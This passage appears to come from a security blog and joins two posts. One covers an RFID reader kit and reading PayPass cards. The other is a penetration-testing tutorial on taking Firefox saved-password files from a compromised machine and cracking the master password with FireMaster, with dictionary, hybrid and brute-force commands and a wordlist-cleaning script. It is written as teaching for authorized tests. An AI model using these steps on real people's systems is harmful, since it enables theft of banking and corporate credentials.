    Unfortunately the next project that I wanted to pursue involved the reading of ISO 14443A/B tags, which wasn't supported by my ACG reader (the upgraded model does, hence my recommendation for the upgrade). In order to support the reading of ISO 14443A/B tags, I picked up the Omnikey Cardman 5321, which also has a smart card reader.


    Ooh, two hacking tools in one! I did acquire this reader much cheaper here in the US. The supplier no longer has them available, but there are several that are Google-able. In typical fashion I wanted to be able to read ISO 14443A/B tags in order to read PayPass RFID tags, which I found out isn't supported by RFIDIOt...yet. A chat with Major Malfunction at Defcon revealed that he is close to being able to support the PayPass chips.

    Going Standalone

    I was also fortunate to be able to acquire some Parallax modules from the Defcon Wireless Village RFID scavenger hunt a few years ago. Thorn put them together in a kit to build a standalone EM4x02 reader with a serial LCD display.


    It worked great, but I've got some new plans for the modules, such as integrating them with an Arduino and a few extra goodies for good measure.

    The Latest Goods

    A few weeks ago I picked up a VivoPay PayPass 3000 reader from eBay for a few dollars (under $10).


    It was "tested and working", and it does appear to be that way. Unfortunately I need to construct a serial adapter for it, and my tools seem to be missing. I have some headed my way this afternoon, so this is an ongoing project.

    The neat option with this reader is the PayPass support. It will read the card and handle all of the over-the-air encryption. The module handles all of the decryption and hands off the clear text of the tag via serial; this is the port that would be connected to the Point of Sale system. Bonus: let's use the hardware for its intended purpose, let it do the crypto for us, and interface with 3ric's pwnpass script. Stay tuned for more goodies with this one.

    [Update: During the writing of this post, I was successful in building the serial adapter and testing it with the tools from VIVOtech, as well as the pwnpass script. However, I think that this reader has an old version of firmware that cannot understand the commands issued to it. I have to call VIVOtech to get hold of the latest firmware, which I'm told is fairly easy to do.]

    You'll note that I don't have any inventory of active RFID equipment; all of my gear is passive. I haven't had any experience with any active gear, and for me, the cost is more prohibitive.

    Right now, that's what I've got in my kit, and I've found I can read just about any type of tag that I can encounter, from passports to physical security cards. Some are a work in progress, but they are just a matter of time. Scan away! Also, I'm more than willing to let you scan my RFID implant in person should we meet.

    Larry "haxorthematrix" Pesce

    To quote Carlos "dark0perator" Perez, "shell is just the beginning". Now that we have access to a machine, we can gather all sorts of goodies; we just need to know where to look.

    Some of my favorite local system information gathering techniques include grabbing Firefox stored passwords. Prior to version 3.5 (i.e. for version 3), the list of sites and associated passwords was stored in signons3.txt. If a master password is set, you also need the file "key3.db", as it is what unlocks the password store. For Firefox versions 3.5 or later, you need to acquire the file "signons.sqlite". For a detailed description of the contents and format of each of these files, check out the FirePassword page.

    But why recover these usernames and passwords? How many people do you know who let their browser store passwords for them? Personally, I know a lot. Users store passwords for just about everything: personal sites, banking and corporate resources.

    Yes, corporate resources. If you have credentials to these resources, this may open up a whole new world to your testing. Imagine that you now have credentials to web based management utilities allowing access to a million credit card numbers (or something as equally juicy such as social security numbers).

    So how do we do it? Ok, first grab the signons3.txt and key3.db files (or signons.sqlite for Firefox 3.5) and get them to a system where you can work with them. I'm finding that a Windows system is best, given the tools available. I'm using Windows 7 in a VM, with Firefox installed. Many of the tools like to look for the default Firefox profile directory, so I often copy the files there; I'm not concerned about the install of Firefox in this VM.

    The Firefox browser itself can be used to view the passwords in the password store. Firefox 3.5 uses a different format for storing passwords; it now stores them in a SQLite database. If we copy over the files (signons3.txt and key3.db) to the default Firefox profile (C:\Documents and Settings\[user]\Application Data\Mozilla\Profiles\[random].profile in many cases), run Firefox, and go to Tools -> Options -> Security -> Saved Passwords -> Show Passwords, we can see them in plain text. Neat, now we have the URL, username and password! But wait, you mean now we are being asked for a master password? Well, we need to provide one in order to view the passwords!

    We can use FireMaster to obtain the master password. FireMaster is a Windows-based master password brute force tool, and operates against key3.db and signons3.txt. It will do all of the typical brute force attacks: dictionary, hybrid, and pure brute force. It is a fairly simple tool to use, but here are a few examples. In these examples, FireMaster is in the same directory as key3.db and signons3.txt, so my profile path is set as "." at the end of the command:

    [Update: During the writing of this segment, I noted that the author updated FireMaster to automatically detect the version of Firefox based on whether the information is stored in signons3.txt or with the sqlite method! We can now use this tool to get the goods from Firefox 3.5 as well.]

    Below is an example of a dictionary attack:

    FireMaster.exe -d -f wordlist.txt .

    Note that you need to be careful with your wordlist. I used a copy of the all-inclusive free version from ftp.openwall.org, which I had to convert from LF to CRLF. I also had to remove words with spaces and non-US character sets. If I didn't, I got a nasty crash from FireMaster. Can you say potential buffer overflow, anyone?
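The three clean-ups described above (LF to CRLF, dropping entries with embedded spaces, dropping non-US character sets) as one added Python script; this is example code written for this page, not a tool from the post or from the FireMaster author, and the sample words in the docstring are constructed. It also drops empty and duplicate lines and reports what it removed, so you can see how much of a list was actually unusable.

```python
"""Normalize a wordlist into the shape the post says FireMaster tolerates:
ASCII only, no whitespace inside an entry, CRLF line endings.

Added example for this page (not the post's or FireMaster's own code).
Usage: python normalize_wordlist.py all.lst all-clean.lst
"""
import sys
from typing import Dict, Tuple


def normalize_wordlist(raw: bytes) -> Tuple[bytes, Dict[str, int]]:
    """Return (cleaned bytes with CRLF endings, counts of kept/dropped lines)."""
    stats = {"kept": 0, "non_ascii": 0, "whitespace": 0, "empty": 0, "duplicate": 0}
    seen = set()
    kept = []
    # bytes.splitlines() splits on LF, CRLF and bare CR, so mixed input is fine.
    for line in raw.splitlines():
        if not line.strip():
            stats["empty"] += 1
            continue
        try:
            word = line.decode("ascii")          # non-US character sets are rejected here
        except UnicodeDecodeError:
            stats["non_ascii"] += 1
            continue
        if any(ch.isspace() for ch in word):     # "foo bar" style entries
            stats["whitespace"] += 1
            continue
        if word in seen:                         # same guess twice is wasted time
            stats["duplicate"] += 1
            continue
        seen.add(word)
        kept.append(word)
    stats["kept"] = len(kept)
    # Emit explicit CRLF terminators as bytes so no platform newline translation applies.
    out = b"".join(w.encode("ascii") + b"\r\n" for w in kept)
    return out, stats


if __name__ == "__main__":
    src, dst = sys.argv[1], sys.argv[2]
    with open(src, "rb") as f:
        cleaned, counts = normalize_wordlist(f.read())
    with open(dst, "wb") as f:
        f.write(cleaned)
    print(counts)
```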


    Below is an example of a hybrid attack:

    Firemaster.exe -h -f wordlist.txt -n 3 -g "0123456789" -s -p .

    Again, same wordlist issues. With the hybrid, it will append (-s) and prepend (-p) the number of characters (-n 3) as defined by the given character set (-g). The larger your number of characters and character sets, the more time you will need.

    Below is an example of a brute force attack:

    FireMaster.exe -b -l 10 .

    This one will set the max password length to 10 characters (-l), so adjust to your needs. It also uses the default character set of "abcdefghijklmnopqrstuvwxyz*@#!$123", which you may also need to tailor with the -g option. On my machine this would take over 300,000 days to complete at about 120,000 guesses a second. On a high end, non-virtual system the guessing jumped up to about 250,000 guesses a second, for about 160,000 days to completion.

    Ouch.

    My vote is for a good dictionary. We covered scraping websites for making custom wordlists in Episode 129 of the podcast.

    I've also had some good luck with Firefox Password Recovery from top-password.com. Granted, it wasn't free, but the $18 was something I could afford as expenses on an engagement. It won't crack or bypass the master password, but it may be a little safer than a machine running an old version of Firefox. Just another option. It hasn't been updated for the signons.sqlite of Firefox versions 3.5 or later yet.

    So, want a free solution? The author of FireMaster has a command line FirePass and GUI FirePasswordViewer tool to do the same, with Firefox 3.5 support! Start recovering and use the results responsibly (and with permission)!

    - Larry "haxorthematrix" Pesce